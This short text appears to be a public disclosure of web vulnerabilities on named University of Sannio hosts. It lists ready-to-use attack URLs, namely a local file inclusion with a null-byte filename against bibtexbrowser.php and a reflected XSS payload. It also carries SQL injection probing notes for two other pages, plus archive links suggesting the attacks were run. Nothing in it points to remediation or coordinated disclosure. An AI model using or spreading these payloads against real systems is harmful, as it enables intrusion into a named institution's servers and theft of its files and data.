ding.unisannio.it | local file inclusion, sql injection, xss

Local file inclusion

http://people.ding.unisannio.it/villano/villano/bibtexbrowser.php?frameset&bib=bibtexbrowser.php

http://people.ding.unisannio.it/villano/villano/bibtexbrowser.php?bib=[filename%00]

archived: https://archive.ph/wip/bUcUv

XSS

http://people.ding.unisannio.it/villano/villano/bibtexbrowser.php?frameset&bib=%3Cimg%20src=/%20onerror=%22alert(1)%22%3E

Archived: https://archive.md/wip/WJf5b

(Guagliunastri. ... a fragol', a limon'! - Un grande il prof. Villano)

-----

http://old.ing.unisannio.it/ects/scheda_en.php?1565

we can specify a column with the parameters

http://old.ing.unisannio.it/ects/scheda_en.php?studenti

archived: https://archive.ph/wip/zKWmP

There is a need to bypass the url encoding and we cannot use spaces.

---

%'%

http://old.ing.unisannio.it/cerca_persone/index.php

---

pro(re)gress